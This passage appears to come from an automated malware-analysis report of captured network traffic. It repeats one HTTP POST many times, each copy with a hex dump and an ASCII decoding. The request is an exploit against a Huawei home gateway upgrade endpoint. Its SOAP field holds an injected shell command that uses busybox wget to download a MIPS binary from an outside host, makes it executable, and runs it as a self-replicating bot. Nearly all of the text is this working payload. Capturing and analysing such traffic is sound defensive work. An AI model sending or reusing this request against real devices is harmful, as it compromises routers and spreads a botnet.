62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 